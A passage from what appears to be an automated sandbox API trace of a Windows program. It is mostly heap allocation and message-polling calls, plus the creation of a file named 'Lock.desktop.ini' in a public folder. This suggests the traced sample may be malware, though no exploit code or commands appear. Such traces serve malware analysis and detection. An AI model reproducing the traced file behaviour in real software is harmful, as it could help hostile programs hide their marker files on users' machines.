PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0268.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0268.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0268.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0268.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.321] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos/" (normalized: "c:\\users\\public\\videos")) returned 0x11 [0268.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0268.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0268.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3561010 [0268.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0268.322] CreateFileW (lpFileName="C:\\Users\\Public\\Videos/Lock.desktop.ini" (normalized: "c:\\users\\public\\videos\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0268.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0268.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.323] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0268.323] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.323] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0268.323] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0268.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0268.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0268.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0268.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0268.326] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0268.326] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x17c, lpOverlapped=0x0) returned 1 [0268.327] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0268.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x249c7b0 [0268.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0268.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0268.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0268.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x24b2e00 [0268.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0268.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.329] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0268.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x249c7b0 [0268.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0268.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.330] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0268.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0268.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0268.331] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.331] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0268.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0268.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x249c7b0 [0268.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0268.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa868 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0268.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17c) returned 0x24b2f88 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0268.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0268.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0268.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0268.335] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0268.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0268.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0268.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0268.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0268.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0268.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0268.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0268.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0268.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0268.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0268.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0268.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0268.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.340] HeapFree (in: hHeap=0x25c0000, 